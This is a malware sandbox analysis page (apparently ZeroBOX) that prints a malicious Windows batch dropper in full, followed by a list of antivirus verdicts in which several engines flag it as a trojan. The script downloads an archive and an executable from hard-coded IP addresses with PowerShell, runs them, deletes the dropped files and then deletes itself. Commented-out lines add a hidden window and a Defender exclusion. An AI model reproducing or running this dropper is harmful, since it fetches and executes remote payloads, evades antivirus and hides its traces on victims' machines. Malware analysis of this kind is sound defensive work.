Static | ZeroBOX
No static analysis available.
@echo off
@REM powershell -window hidden -command ""
@REM if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
@REM powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath %TEMP%
@REM tar -xf main.zip
cd %TEMP%
Powershell -Command "Invoke-Webrequest 'http://85.209.133.18/LgGFdDAm/win1.zip' -OutFile win1.zip"
Powershell -Command "Invoke-Webrequest 'http://147.189.128.224/tbsh/troubleshoot.exe' -OutFile troubleshoot.exe"
start "" /b %TEMP%\troubleshoot.exe
Powershell -Command "Expand-Archive -Path %TEMP%\win1.zip -DestinationPath %TEMP% -Force"
%TEMP%\main.exe
del %TEMP%\win1.zip
del %TEMP%\troubleshoot.exe
del %TEMP%\lander.vbs
(goto) 2>nul & del "%~f0"
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.BAT.Agent.gen
BitDefender Heur.BZC.MNT.Boxter.928.2802AE7E
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.MNT.Boxter.928.2802AE7E
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.MNT.Boxter.928.2802AE7E
TrendMicro Clean
FireEye Heur.BZC.MNT.Boxter.928.2802AE7E
Emsisoft Heur.BZC.MNT.Boxter.928.2802AE7E (B)
GData Heur.BZC.MNT.Boxter.928.2802AE7E
Jiangmin Clean
Varist Clean
Avira Clean
MAX malware (ai score=81)
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.MNT.Boxter.928.2802AE7E
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.BAT.Agent.gen
Microsoft Trojan:BAT/Malgent!MSR
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus BZC.MNT.Boxter
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:Win/Malgent.Gen
No IRMA results available.